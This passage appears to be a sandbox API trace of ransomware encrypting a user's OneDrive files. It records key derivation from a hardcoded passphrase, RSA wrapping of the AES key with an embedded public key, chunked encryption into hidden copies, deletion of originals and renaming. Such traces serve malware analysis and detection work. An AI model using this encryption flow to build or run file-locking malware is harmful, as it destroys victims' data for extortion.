(hHash=0x2fa6c8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.718] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0273.719] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.719] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0273.719] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f28f58) returned 1 [0273.719] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28f58, dwCertEncodingType=0x1, pInfo=0x2f33d60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33d90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33d98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa988) returned 1 [0273.719] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0273.720] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29860*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f29860*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0273.720] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f29860*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f29860*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0273.721] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.738] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.738] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.756] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.756] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.756] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.756] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.757] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.757] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.757] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0273.757] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0273.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x94, lpOverlapped=0x0) returned 1 [0273.758] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x94, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xa0) returned 1 [0273.758] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xa0, lpOverlapped=0x0) returned 1 [0273.758] CloseHandle (hObject=0x5d3c) returned 1 [0273.758] CloseHandle (hObject=0x5d4c) returned 1 [0273.758] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat"), bFailIfExists=0) returned 1 [0273.761] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat", dwFileAttributes=0x0) returned 1 [0273.761] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat.gsg")) returned 1 [0273.763] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat.fuck")) returned 1 [0273.764] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.764] CryptDestroyKey (hKey=0x2fa748) returned 1 [0273.764] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0273.764] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.764] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0273.765] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.765] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.765] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.765] GetLastError () returned 0x0 [0273.765] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.766] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.766] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.767] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.769] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.769] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f29068) returned 1 [0273.772] CryptCreateHash (in: hProv=0x2f29068, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.772] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0273.772] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.772] CryptDeriveKey (in: hProv=0x2f29068, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.772] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.772] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.772] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28ed0) returned 1 [0273.772] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28ed0, dwCertEncodingType=0x1, pInfo=0x2f33f00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33f30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33f38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fa9c8) returned 1 [0273.772] CryptEncrypt (in: hKey=0x2fa9c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.773] CryptEncrypt (in: hKey=0x2fa9c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29178*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29178*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29178*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29178*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.786] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.786] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.789] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.789] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.789] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.790] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.790] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.790] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.790] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.791] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.791] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.791] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.791] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.791] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.792] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.792] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.792] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.792] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.793] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] ReadFile (in: 